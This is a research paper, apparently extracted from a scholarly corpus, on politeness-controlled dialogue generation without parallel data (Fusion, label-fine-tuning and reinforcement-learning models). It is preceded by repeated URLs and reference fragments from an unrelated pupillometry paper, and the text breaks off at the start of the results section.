http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://dx.doi.org/10.1016/j.promfg.2015.07.783 http://dx.doi.org/10.3758/BF03210453 http://dx.doi.org/10.1016/j.neuroimage.2007.04.066 http://dx.doi.org/10.3758/BF03331236 http://dx.doi.org/10.1111/j.1469-8986.1975.tb03068.x http://dx.doi.org/10.7717/peerj-cs.16 Van der Meer E, Beyer R, Horn J, Foth M, Bornemann B, Ries J, Kramer J, Warmuth E, Heekeren HR, Wartenburger I. 2010. Resource allocation and fluid intelligence: insights from pupillometry. Psychophysiology 47:158–169 DOI 10.1111/j.1469-8986.2009.00884.x. Van der Molen MW, Boomsma DI, Jennings JR, Nieuwboer RT. 1989. Does the heart know what the eye sees? A cardiac/pupillometric analysis of motor preparation and response execution. Psychophysiology 26:70–80 DOI 10.1111/j.1469-8986.1989.tb03134.x. Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 20/20 https://peerj.com/computer-science/ http://dx.doi.org/10.1111/j.1469-8986.2009.00884.x http://dx.doi.org/10.1111/j.1469-8986.1989.tb03134.x http://dx.doi.org/10.7717/peerj-cs.16 Workload assessment for mental arithmetic tasks using the task-evoked pupillary response Introduction Method Ethics statement Participants Equipment Procedure Instructions to participants Data processing Statistical analyses Results Mean pupil diameter (MPD) Mean pupil diameter change (MPDC) Mean pupil diameter change rate (MPDCR) Self-reported workload (NASA-TLX) Pupil diameter of correct versus incorrect responses Blink rate Correlations between MPDC, NASA-TLX, and proportion of incorrect responses Discussion Pupil diameter results Self-reported workload (NASA-TLX) Blink rate Correlations between MPDC, NASA-TLX, and proportion of incorrect responses Conclusions and recommendations References work_75gdtwc2zvf7ta3kal27fs4suu ---- Polite Dialogue Generation Without Parallel Data Tong Niu and Mohit Bansal UNC Chapel Hill {tongn, mbansal}@cs.unc.edu Abstract Stylistic dialogue response generation, with valuable applications in personality-based conversational agents, is a challenging task because the response needs to be fluent, contextually-relevant, as well as paralinguis- tically accurate. Moreover, parallel datasets for regular-to-stylistic pairs are usually un- available. We present three weakly-supervised models that can generate diverse, polite (or rude) dialogue responses without parallel data. Our late fusion model (Fusion) merges the decoder of an encoder-attention-decoder dia- logue model with a language model trained on stand-alone polite utterances. Our label-fine- tuning (LFT) model prepends to each source sequence a politeness-score scaled label (pre- dicted by our state-of-the-art politeness classi- fier) during training, and at test time is able to generate polite, neutral, and rude responses by simply scaling the label embedding by the cor- responding score. Our reinforcement learn- ing model (Polite-RL) encourages politeness generation by assigning rewards proportional to the politeness classifier score of the sam- pled response. We also present two retrieval- based, polite dialogue model baselines. Hu- man evaluation validates that while the Fu- sion and the retrieval-based models achieve politeness with poorer context-relevance, the LFT and Polite-RL models can produce sig- nificantly more polite responses without sacri- ficing dialogue quality. 1 Introduction Generating stylistic, personality-based language is crucial to developing engaging, convincing, and trustworthy conversational agents, for their effec- tive application in intelligent tutoring, home assis- tance, online reservations/purchasing, health care, etc. Most current chatbots and conversational mod- els lack any such style, which can be a social issue because human users might learn biased styles from such interactions, e.g., kids learning to be rude be- cause the dialogue system encourages short, curt re- sponses, and also does not itself use politeness to set an example.1 In this work, we focus on the impor- tant and diverse paralinguistic style axis of polite- ness vs. rudeness (Brown and Levinson, 1987). Generating stylistic dialogue responses is a sub- stantially challenging task because the generated re- sponse needs to be syntactically and semantically fluent, contextually-relevant to the conversation, as well as convey accurate paralinguistic features. This is further complicated by the fact that content and style are only available in separate unpaired datasets, as opposed to translation-type parallel datasets con- taining regular-to-stylistic text pairs. Hence, we need indirectly-supervised models that can incorpo- rate style into the generated response in absence of parallel data (i.e., where the training data for the conversation, versus style components, comes from two different datasets or domains), while still main- taining conversation relevance. In this work, we present three such weakly- supervised models2 that can generate diverse, nat- ural, and contextually-relevant polite (and rude) di- 1https://qz.com/701521/parents-are-worried-the-amazon- echo-is-conditioning-their-kids-to-be-rude/ 2The first version of this paper with the three Fusion, Discrete-LFT, and Polite-RL models was submitted on Oct 1, 2017. The two retrieval baselines and the continuous version 373 Transactions of the Association for Computational Linguistics, vol. 6, pp. 373–389, 2018. Action Editor: Colin Cherry. Submission batch: 10/2017; Revision batch: 2/2018; Published 6/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. alogue responses, using data from separate style and dialogue domains: the Stanford Politeness Cor- pus (Danescu-Niculescu-Mizil et al., 2013) with Wikipedia and Stack Exchange requests, and the MovieTriples Dialogue Corpus (Serban et al., 2016) with IMSDB movie scripts, respectively. Each of our three models is based on a state-of-the-art polite- ness classifier and a sequence-to-sequence dialogue model. The first model (Fusion) employs a late fu- sion technique to merge the response generation de- coder of the dialogue model with a language model trained on polite utterances chosen by the politeness classifier. The second label-fine-tuning (LFT) model prepends to the input utterance a single politeness la- bel whose embedding is continuously scaled by the politeness score of the target sequence during train- ing. This score is determined by feeding the cor- responding ground-truth target sequence to our po- liteness classifier. During test time, we show that the LFT model is able to control the politeness level of generated responses by simply scaling the la- bel’s embedding by the continuous target politeness score of our choice. Our third reinforcement-based model (Polite-RL) encourages politeness generation by using the continuous-scale politeness score of the decoder-sampled sentence as a reward (via mixed- objective policy gradient methods), i.e., polite utter- ances are encouraged with positive reward, and rude ones discouraged with negative reward. Hence, our models only need a style classifier (without parallel data) to automatically influence and encourage continuous-scale stylistic language generation in a complex dialogue setup, which also requires maintaining relevance to conversational context. Each of these models requires minimal changes to the architecture of either the underly- ing sequence-to-sequence (Seq2seq) dialogue base model or the style classifier, and hence can mod- ularly update the architecture with the latest state- of-the-art dialogue models or style classifiers (and for diverse styles). In addition, we also employ two retrieval-based models, where we output the re- sponse which has the highest match with the in- put context from a set of classifier-picked polite responses or manually-picked generic polite utter- of the LFT model were added to the Feb 1, 2018 resubmission based on reviewer discussions. ances. These two retrieval models serve as parallel investigations on the performance of our three pro- posed generative models above. We conducted multiple human evaluations (for style and dialogue quality) on Amazon Mechani- cal Turk (MTurk) (Buhrmester et al., 2011) for all three models plus the base sequence-to-sequence di- alogue model and the retrieval-based models, and show that while the Fusion and the two retrieval models increase the politeness level of responses at the cost of poorer dialogue quality, both our LFT and Polite-RL models can successfully produce po- lite responses (capturing several politeness strategies discussed by Brown and Levinson (1987)), without sacrificing dialogue coherence and relevance com- pared to the base Seq2seq model (hence better bal- ance between politeness and dialogue quality). We also compare the output dialogue politeness levels of the continuous LFT model for three different po- liteness levels. Finally, we present several detailed qualitative and quantitative analyses, including pos- itive and negative output examples, automatic metric results on output responses, classifier error analysis, and visualization of the RL rewards. 2 Related Works 2.1 Models for Style Transfer Style Transfer with Parallel Data There have been multiple works on style transfer with parallel data. These tasks can often be solved by directly ap- plying some variation of translation-based Seq2seq model discussed in the previous section. For ex- ample, Xu et al. (2012) use a phrase-based statis- tical model, and Jhamtani et al. (2017) use a stan- dard Seq2seq model to convert modern language to Shakespeare-style language by treating style transfer as a translation task. Some labeled sequence trans- duction methods have also been proposed (Kobus et al., 2017; Yamagishi et al., 2016; Johnson et al., 2017). For example, Kikuchi et al. (2016) are able to control the length of the summarization text by feeding to the Seq2seq base model a label that in- dicates the intended output length in addition to the source input. Our LFT model also adopts this la- beling idea, and is able to handle a similar situation but without parallel data, because by labeling each target sequence in the training set with its politeness 374 classifier score, we are essentially converting non- parallel data to (noisy) parallel data (by using a clas- sifier with high accuracy). Style Transfer without Parallel Data Several previous works have looked at style transfer with- out parallel data, in both vision (Gatys et al., 2016; Zhu et al., 2017; Liu and Tuzel, 2016; Liu et al., 2017; Taigman et al., 2016; Kim et al., 2017; Yi et al., 2017), and text (Sennrich et al., 2016a; Hu et al., 2017; Ghosh et al., 2017; Zhao et al., 2017; Mueller et al., 2017; Wang et al., 2017; Luan et al., 2017). Among these models, some are bag-of-words based, i.e., they use style-related keywords to annotate the target sequences in the training set. For example, to control how formal the output sequences are in a EN-DE translation task, Sennrich et al. (2016a) la- beled each target sequence based on whether it con- tains formal or informal verbs and pronouns (hon- orifics). To build a language model that generates utterances with the desired style, Ficler and Gold- berg (2017) annotated their text with meta-data and keywords/POS tags based heuristics, while Ghosh et al. (2017) also adopted keyword spotting based on a dictionary of emotional words. The basic ideas of their models are similar to that of our LFT model. However, these keyword-spotting approaches do not fully extend to our politeness generation task, be- cause politeness strategies follow complex patterns of grammar, word order, and phrasing (Danescu- Niculescu-Mizil et al., 2013). For example, the po- liteness of please depends on where it occurs in a sentence, and what other politeness markers it co- occurs with (e.g., ‘could/would you’ style counter- factual modals vs. ‘can/will you’ style indicative modals). Therefore, our novel polite dialogue mod- els are based on an accurate neural classifier, which is better at capturing several compositional paralin- guistic features (as visualized in Aubakirova and Bansal (2016), whose politeness classifier we ex- tend). Moreover, our LFT and Polite-RL models can generate a continuum of style levels based on the continuously-scaled (by the politeness score) label embedding or reinforcement rewards. Lastly, there have also been style transfer mod- els that rely on the latent representation of text and use variational auto-encoders or cross-alignment to disentangle the representation of content and style in text (Hu et al., 2017; Shen et al., 2017; Zhao et al., 2017; Fu et al., 2018). During inference time, the latent style representation is combined with new content to generate stylized, content-preserving text. Although both fall into the category of style transfer, our task differs in two important aspects from their tasks. First, as opposed to the task of strict content preservation when rephrasing a sentence to a differ- ent style, our task is about maintaining good rele- vance to the context when adding style, especially useful for dialogue-based tasks. Another distinc- tive trait of our task is that politeness resides in a spectrum rather than a fixed category or topic (e.g., Shakespearean), and our models can treat politeness as a continuum, i.e., controlling the politeness level by adjusting the fusion rate in the Fusion model, the magnitude of the continuous label in the LFT model, or the RL weight in the Polite-RL model. 2.2 Multi-Task Learning and Style Transfer In order to obtain a persona-based conversational agent, Luan et al. (2017) proposed a multi-task learning (MTL) based approach: they train a Seq2seq model with conversation data and an au- toencoder with non-conversational persona-related data from target speakers, and share the decoder parameters of these two models so that the gener- ated responses can be adapted to the style of the target-speaker. This way of incorporating MTL into Seq2seq learning was first investigated by Dong et al. (2015) and Luong et al. (2016) to achieve mul- tilingual NMT. In addition, Sennrich et al. (2016b) also employed MTL to improve NMT models with monolingual (non-parallel) data. These approaches are related to our Fusion model, because we use our classifier to obtain noisy polite target sequences (non-parallel data) that a polite language model trains on; next, during inference, we combine the parameters of the language model with a genera- tive dialogue model trained on parallel data. In gen- eral, our models are also related to previous works like Johnson et al. (2017), who adopted labeled se- quence transduction methods for MTL tasks, be- cause our task also involves adapting generated re- sponses to different politeness styles and optimizing two sub-tasks’ (namely response and politeness gen- eration) loss functions (related to a multi-task setup). 375 2.3 Politeness Studies Danescu-Niculescu-Mizil et al. (2013) created the Stanford Politeness Corpus and trained an SVM classifier using a list of useful linguistic features based on strategies from Brown and Levinson’s theory of politeness (Brown and Levinson, 1987). Aubakirova and Bansal (2016) recently took an end- to-end neural approach to this politeness classifi- cation task by training a CNN model that directly learns to identify polite requests without using any hand-engineered features, while still improving on prediction accuracy. They also visualized what fea- tures the CNN model was learning and discovered some new features along the way. Our classifier mainly extends their work by adding a bi-directional LSTM layer (Hochreiter and Schmidhuber, 1997; Schuster and Paliwal, 1997) before the CNN layer to capture long-distance relationships in the sentence, which leads to higher cross-domain performance. A related early work in personality-based dia- logue is Mairesse and Walker (2007), who stud- ied introvert/extrovert personality language based on templated content and sentence planning (via personality dimensions such as hedges, tag ques- tions, negations, subject implicitness, etc.). Relat- edly, Sennrich et al. (2016a) use an English to Ger- man translation task to present a model that can gen- erate target sequences that are either formal or infor- mal, specifically based on honorifics-related verbs and pronouns. Our task is more general, taking into account several politeness-related paralinguis- tic features of Brown and Levinson (1987) and al- lowing end-to-end trainable stylistic dialogue gen- eration with a polite-to-rude spectrum (based on a politeness classifier, without relying on parallel data). Moreover, our approaches allow simply re- placing the politeness classifier with any other emo- tion or personality based language classifier to gen- erate stylistic dialogue for that new style dimension. 3 Politeness Classification Model In order to develop an accurate politeness classifier for effective use in stylistic dialogue response gener- ation, we extend and improve upon the state-of-the- art CNN model of Aubakirova and Bansal (2016), and propose a bi-directional LSTM followed by a convolutional layer (see Figure 1), in order to both S 1 S 2 S 3 S 4 embedding Convolution layer polite rude LSTM LSTM LSTM LSTM LSTM LSTM LSTM LSTM concat concat concat concat Softmax Max-pooling Figure 1: Our LSTM-CNN politeness classifier. capture long-distance relationships in the sentence as well as windowed filter based features. For a sentence v1:n (where each token vi is a d-dim word embedding vector), the LSTM layer first produces hidden states h1:n (where ht is the concatenation of forward and backward hidden states at time step t). A filter m is then applied on a window of u hidden states. This produces a convolution feature ci = f(m ∗ vi:i+u−1 + b), where f is a non-linear function and b is a bias term. Every feature map c ∈ Rn−u+1 is applied to each window, so that c = [c1, ...,cn−u+1]. The output of the convolu- tional layer is then fed to a max-pooling layer (Col- lobert et al., 2011) which gives C = max{c} for the filter. Filters of various sizes are used to ob- tain multiple features. The result is then passed to a fully-connected softmax layer that outputs proba- bilities over two labels, namely Polite and Rude. Our classification model achieves compara- ble in-domain accuracy and improved cross- domain accuracy over the state-of-the-art results reported in Danescu-Niculescu-Mizil et al. (2013) and Aubakirova and Bansal (2016). We will discuss these results in detail in Section 6. 4 Polite-Style Dialogue Models In this section, we first describe our base dialogue model, i.e., the core (backbone) dialogue architec- ture upon which the three proposed politeness mod- 376 Input S1 S2 S3 Response by Seq2seq Q1 Q3 T1 T2 Response by LM G1 G2 G3 Q2 Figure 2: Fusion model: the output probability distribu- tions of the decoder and the polite-LM are linearly mixed to generate the final decoded outputs. els are built, and then present these three models that can generate polite dialogue responses. As a paral- lel investigation on the performance of our proposed models, we also employ two retrieval-based polite dialogue models toward the end. 4.1 Base Seq2seq Dialogue Model Our base dialogue model is a simple sequence-to- sequence (Seq2seq) model that consists of a two- layer bi-directional LSTM-RNN encoder to encode the conversation history turns, and a four-layer LSTM-RNN decoder to generate the response. Ad- ditive attention from the output of the encoder is ap- plied to the last layer of the decoder. This archi- tecture is almost identical to that proposed by Bah- danau et al. (2015), except with more layers (simi- lar to Shao et al. (2017)). Our base dialogue model achieves perplexity and word error rate results on par with those reported for the popular hierarchical HRED models in Serban et al. (2016), thus serving as a good base model to incorporate style into. De- tails will be discussed in Section 6. 4.2 Fusion Model Inspired by the ‘late fusion’ approach in Venu- gopalan et al. (2016), our Fusion model (Fig. 2) combines the response generation decoder of the base Seq2seq dialogue model with a language model (polite-LM) trained exclusively on polite utterances. These utterances are chosen by feeding the classifier all response utterances in the MovieTriples training set, and only keeping those with politeness scores great than a certain threshold (set to 0.8 in our ex- periments, as will be discussed in Section 4.5). The polite-LM model is a two-layer LSTM-RNN based on Jozefowicz et al. (2016). During inference time, we used the language S1 S2 S3 G1 G2 G3 T1 T2 T3 Input Generated Response Politeness Classifier Target politeness score Figure 3: Label-Fine-Tuning model: during training, the embedding of the prepended label is scaled by the style classifier’s continuous score on the ground-truth (target) sequence. During testing, we scale the embedding of the label by the desired (continuous) politeness score of the generated response. model to re-score the final output of the Seq2seq decoder (for each time step) by computing a lin- ear combination of the output vocabulary distribu- tions proposed by the Seq2seq model and polite- LM. Specifically, let pS2St and p LM t denote the output probability distributions proposed by the Seq2seq model and the LM model at time t, respectively. The final ‘fused’ distribution pt for that time step is: pt = αp S2S t + (1−α)pLMt (1) where the fusion ratio α is a hyperparameter that in- dicates how much Seq2seq output will influence the final output. 4.3 Label-Fine-Tuning Model There are at least two drawbacks of the Fusion model. First, half of its output is determined by a po- lite language model that has not attended to the con- versation context, making the response more likely to be irrelevant. Second, the model does not learn politeness during training, but is forced to be polite only during inference time. To address these two is- sues, we present our label-fine-tuning (LFT) model, which prepends a predicted continuous style label at the beginning of each input sentence to specify the intended politeness level. Specifically, we add to the vocabulary a single po- liteness label and attach with it a trainable word em- bedding, just like what we would do to a normal to- ken. Then, the way we make it continuous is by scal- ing its embedding vector with the (intended) polite- ness score of the target sequence. During training, this score is obtained by feeding the ground-truth target sequence (response) to the politeness classi- 377 Input S1 S2 S3 G1 G2 G3 T1 T2 T3 Generated Response Target H1 H2 H3 H1 H2 H3 Sampled Response Politeness Classifier RL loss MLE Loss RL Loss + Total Loss Figure 4: Polite-RL model: upper-right shows max-likelihood (ML) training with generated and ground-truth target sequences; lower-right shows RL training with a randomly sampled response generated by the model and the reward it generates after getting fed into the style classifier. Note that the attention mechanism is not shown here for clarity. fier (see Figure 3), while during test time, we are free to scale the prepended politeness label with dif- ferent scores of our choice (i.e., when we want the model to generate a polite response, we scale the la- bel’s embedding by a score between 0.5 and 1.0, whereas, to generate a rude response, we scale the embedding by a score between 0.0 and 0.5). This ap- proach is related to the ‘numerically-grounded’ lan- guage model (Spithourakis et al., 2016), except that we scale the politeness label embedding by its corre- sponding politeness score, rather than concatenating the two as input to the LSTM.3 Thus, the LFT model is able to simultaneously produce polite, neutral and rude responses depend- ing on the prepended label, similar to recent multi- label, multi-space, and zero-shot machine trans- lation work using language identity or style la- bels (Sennrich et al., 2016a; Johnson et al., 2017; Ghosh et al., 2017). Intuitively, this prepended label serves as the prior for the intended style of the gen- erated response sequence, while the source utterance serves as the prior for the content of the generated sequence. In other words, the label and the source sentence cooperatively determine what the overall response looks like.4 3Although we trained the politeness classifier to be binary, its outputs are probabilities ranging from 0.0 to 1.0. This allows us to interpret the outputs as continuous politeness scores. 4Note that the position of the label did not affect the results much (e.g., Sennrich et al. (2016a) appended the label at the end of the input sequence). Moreover, our models use a bidi- rectional encoder, which does not distinguish between the be- ginning and end of the source sequence. 4.4 Polite Reinforcement Learning Model The LFT model incorporates style more directly into its training procedure than the fusion model, but it still does not fully exploit the value of the style clas- sifier since it only supervises the dialogue model once by initially classifying the style of all the tar- get sequences in the training set. Ideally we would want the classifier to constantly monitor and influ- ence what style the model produces. Moreover, many contexts do not naturally elicit a polite re- sponse,5 in which case we do not want to force the model to generate an utterance that matches the target politeness score, but rather to ask the model to generate as polite and natural a response as it could. These limitations motivate us to propose the third model: Polite Reinforcement Learning model (Polite-RL), where the style classifier regularly up- dates the model parameters (via sampling-based pol- icy gradient) with continuous-spectrum rewards that encourage decoder-generated response samples to be polite and discourage them from being rude. Following work from Paulus et al. (2018), our loss function consists of two terms. The first term is the traditional maximum likelihood loss (LML ), which we refer to as the teacher forcing part. The other one is the reinforcement learning loss (LRL ) based on politeness scores, which we refer to as the reinforce part. The total loss L then takes the form: L = LML + β LRL (2) 5For example, it is hard to be polite in answering ques- tions like “What’s your name?” (The most “legitimate” answer would be “My name is XX.”, rather than “Thanks for asking! My humble name is XX if you would allow me to say so.”) 378 where β is a hyperparameter indicating how much weight we want to give to the style reward compo- nent of the loss. The teacher forcing part minimizes the average of the maximum-likelihood loss at each decoding step. Specifically, let y∗ = {y∗1,y∗2, ...,y∗n} be the ground-truth response for a given source (conversation history) utterance sequence x. The maximum-likelihood training objective is the min- imization of the loss: LML = − n∑ t=1 log p(y∗t |y∗1, ...,y∗t−1,x). (3) We use a policy gradient method (Williams, 1992; Sutton et al., 2000) to calculate the second term in the objective function. Specifically, we sam- ple a generated response for each input sequence (conversation history) x, and assign to it a reward R, which in our case is the politeness classifier’s probability of the response classified as polite. Let ys = {ys1,ys2, ...,ysn} be the sampled response, then the reinforce part of the loss is: LRL = −(R−Rb) n∑ t=1 log p(yst |ys1, ...,yst−1,x) (4) where Rb is a baseline that helps reduce variance during training (Ranzato et al., 2016). Note that we can invert the classifier scores or re- ward (by flipping the first minus sign in Eq. 4), if we want to encourage rudeness as the style, instead of politeness. This also shows that an advantage of our implementations of the LFT model over the Polite-RL model (at the cost of shallower training) is that the LFT model can multitask to simultaneously produce responses of different style labels at test time, whereas reward-based reinforcement learning can only work in one direction at a time (based on the reward sign).6 4.5 Retrieval-based Models We employ two retrieval-based baseline models as a sanity check to the proposed approaches’ perfor- 6However, to make the reward-based model capable of mul- titasking, one could also prepend various politeness labels to each of the context in the training set (thus generating several examples out of one context), and encourage the generated re- sponse to be consistent with the given label. We will explore this extension in future work. mance: the first with oracle-level fluency, the second with additional oracle-level politeness. Classifier-based Retrieval Following Lowe et al. (2015), for a [X1,Y,X2] triple, our retrieval model treats the context (X1,Y ) and each response (X2) as two documents and converts them to their TF-IDF based vectors (Ramos, 2003) to check for similarity. Specifically, we first obtain all candidate responses in the training set that are polite,7 and calculate their TF-IDF vectors. Then for each context TF-IDF vec- tor in the test set, we calculate its cosine similarity with that of each such polite-classified candidate re- sponse, and output the one with the highest value. Intuitively, for each context we are choosing a re- sponse that is both polite and most relevant to (hav- ing the most word overlaps with) the context. Generic-10 This approach is similar to the one above but uses the 10 manually-chosen most-polite generic utterances as candidate responses for each context. Specifically, we collect all ground-truth po- lite requests from the Stanford Politeness Corpus, split each one into sentences, and then manually pick the most frequent 10 polite sentences.8 We then determine which one to retrieve as a response for each input context, based again on the TF-IDF vec- tor similarity method described above. 5 Experimental Setup 5.1 Datasets As discussed above, we propose models that can deal with style data coming from an unpaired, non- parallel domain, different from the domain of the di- alogue dataset. For our style (politeness) domain, we use the Stanford Politeness Corpus (Danescu- Niculescu-Mizil et al., 2013), which contains a col- lection of requests from Wikipedia (WIKI) editor’s 7We treat only responses in the higher, more-accurate per- centile of [0.8, 1.0] range as polite (and [0.0, 0.2] range as rude). 8The 10 final polite sentences for Generic-10 are “thanks.”, “can you help?”, “can you clarify?”, “no problem.”, “you’re welcome.”, “interesting question.”, “thanks for the answer.”, “could you help please?”, “can you elaborate?” and “nice.”. The 2 rejected ones are “what have you tried?” and “what do you think?”. This shortlist needed some human filtering be- cause in the Stanford Politeness Corpus, each polite example consists of two sentences, and sometimes not both of them are polite, i.e., one of them could be neutral (more generic and task- based). 379 talk pages and the Stack Exchange (SE) question- answering communities. Based on scores from hu- man annotators, these requests are labeled with ei- ther Polite or Rude, with each class equally consist- ing of 1,089 requests for the Wikipedia domain and 1,651 requests for the Stack Exchange domain. For the content (dialogue) domain, we use the popular MovieTriples dialogue corpus (Serban et al., 2016), which contains 245K conversations extracted from IMSDB movie scripts in X-Y-X triplet-utterance for- mat, where X and Y correspond to two movie char- acters (and the model’s task is to generate the last response). 5.2 Evaluation Methods Human To evaluate our models’ ability to gen- erate polite responses without sacrificing dialogue quality, we conducted several comprehensive hu- man evaluation studies on Amazon Mechanical Turk (MTurk). Specifically, we compare the three stylis- tic models w.r.t. the base model on both dialogue quality (i.e., context relevance and coherence) and politeness level.9 For this, we randomly sampled 300 contexts covering all types of conversations and their generated responses from the Seq2seq base model, the three stylistic models, and the retrieval- based models. For each source input, the six re- sponses are randomly shuffled to anonymize model identities. Each response was then annotated by two human evaluators that were located in the US, had an approval rate greater than 98%, and had at least 10,000 approved HITs (Human Intelligence Tasks) on record (to prevent those who had just started using MTurk and hence unconditionally enjoyed a high acceptance rate.). All our human evaluations are performed by two annotators (for both dialogue quality and politeness level) in order to calculate inter-rater agreement, for which we employ Cohens Kappa κ (Cohen, 1968), a score that measures the level of inter-rater agreement between two annota- tors on a classification problem (Artstein and Poe- 9We opted for dialogue quality rather than several separated, fine-grained metrics such as relevance, specificity, informative- ness because Lowe et al. (2017) found that little additional in- formation was provided by adding in more metrics on top of overall dialogue quality, and it also confused MTurkers in many scenarios. We had similar observations in our initial human study on MTurk. sio, 2008). For both dialogue quality and polite- ness evaluations, the human raters were shown the conversation context (input) and the six shuffled re- sponses (from the six models). Clear instructions (closely following those from Wang et al. (2017)) corresponding to each score were shown in the in- terface. More specifically, we asked the annota- tors to first read the context and each of the gener- ated/retrieved responses, and assign a score to each response. They then scored each response on a five- point Likert scale (Likert, 1932) (for both polite- ness and dialogue quality), hence providing absolute measurements but in an overall comparative (rela- tive) setting.10 We explicitly stated that it is possible for them to find some conversation disconnected or lacking context, and encouraged them to make the best guess when in doubt. Using similar instruc- tions (and a 300-sized sample), we also performed a separate 3-way LFT model comparison by setting its target politeness scores to 1.0, 0.5, and 0.0, re- spectively. Automatic Since there do not exist ground-truth stylized versions of the response to the MovieTriples conversations, we only use automatic evaluation metrics as complementary and trend-verification in- formation to the primary human perception studies in this work: we compute BLEU (a phrase-matching based metric; (Papineni et al., 2002)) as an approx- imation of dialogue quality as used by some previ- ous work (Ritter et al., 2011; Galley et al., 2015; Li et al., 2016c). Note that we choose to report BLEU scores not to draw any immediate conclusion (Liu et al. (2016) found that BLEU does not corre- late well with human studies on dialogue quality), but rather to check for match with the trends from 10The Likert scale is a bipolar scaling method that maps each score to a text item that describes the score, e.g., our polite- ness level interface uses ‘Polite’, ‘Slightly Polite’, ‘Neutral’, ‘Slightly Rude’, ‘Rude’; and our dialogue quality study uses ‘Very good’, ‘Good’, ‘Acceptable’, ‘Poor’, and ‘Very poor’, in- stead of the abstract scores 1-5. Note that we did not adopt pairwise comparisons because first, it will create several inde- pendent sets of pairwise results (15 sets in our case), which also raises the cost substantially, and secondly, pairwise comparison does not tell us “by how much” a response is better/equal/worse than the other. In contrast, our absolute scores can help future research compare more directly to our results. We will release our detailed instructions and MTurk interfaces, plus our anno- tation scores on our webpage. 380 human evaluation. We also compute the politeness classifier’s scores as an approximation of politeness level. Sec. 6.3 discusses these results. 5.3 Training Details We now present some important training details.11 Embedding Initialization For all our models, we initialized the embedding matrix with word2vec trained on Google News dataset (about 100 billion words)12 (Mikolov et al., 2013); we use Xavier initializer (Glorot and Bengio, 2010) for out-of- vocabulary words. Pretraining Following Serban et al. (2016), we pretrained the Seq2seq base model for 4 epochs with Q-A SubTle corpus (Ameixa et al., 2014), which contains around 5.5M movie subtitle Q&A pairs. Implementation Details We used 300-dim em- beddings, the AdamOptimizer (Kingma and Ba, 2015) with a learning rate of 0.001, and a dropout rate of 0.2. All models were trained with a mini- batch of size 96. The classifier was trained for 3 epochs, and the three proposed stylistic models were each trained for 35 epochs. The polite language model used in the Fusion model was trained until there was no improvement for perplexity on a held- out dev-set (all tuning decisions were made on the respective dev-sets). We use a balanced value of 0.5 for the fusion ratio (α in Eq. 1), and 2.0 for the RL weight (β in Eq. 4) after some light empirical tun- ing. Due also to the nearly perfect balance between the number of polite and rude examples in the Stan- ford Politeness Corpus, we set the baseline reward of Polite-RL (Rb in Eq. 4) to a constant 0.5 at all times.13 Note that for effective and non-confusing MTurk studies, for all our models (the base model 11We will add all reproducibility details and more analysis examples in a post-publication supplement on our webpage. 12https://code.google.com/archive/p/ word2vec/ 13We also tried using a self-critical baseline as in Rennie et al. (2017), but found that our way of setting the constant-based baseline led to better responses. We speculate that this is be- cause a self-critical approach tries to make an utterance as po- lite as possible, which usually leads to a few very generic and very polite responses at convergence (because the model gets a positive reward only when the sampled utterance is more polite than the greedy-decoded one). WIKI SE SVM 82.6% 65.2% CNN 85.8% 66.4% LSTM-CNN 85.0% 70.2% Table 1: Politeness classification accuracies. Top results are boldfaced. and the three stylistic models), we avoid UNK to- kens to appear in the generated response, by not back-propagating the MLE loss for these tokens. We also do the same for a short list (around 10) of very offensive swear words (from Wiktionary). 6 Results In this results section, we first briefly present our po- liteness classifier (Sec. 3) and base dialogue model (Sec. 4.1) results, and then focus on the stylistic- dialogue results (retrieval and generative). 6.1 Politeness Classification Results Following 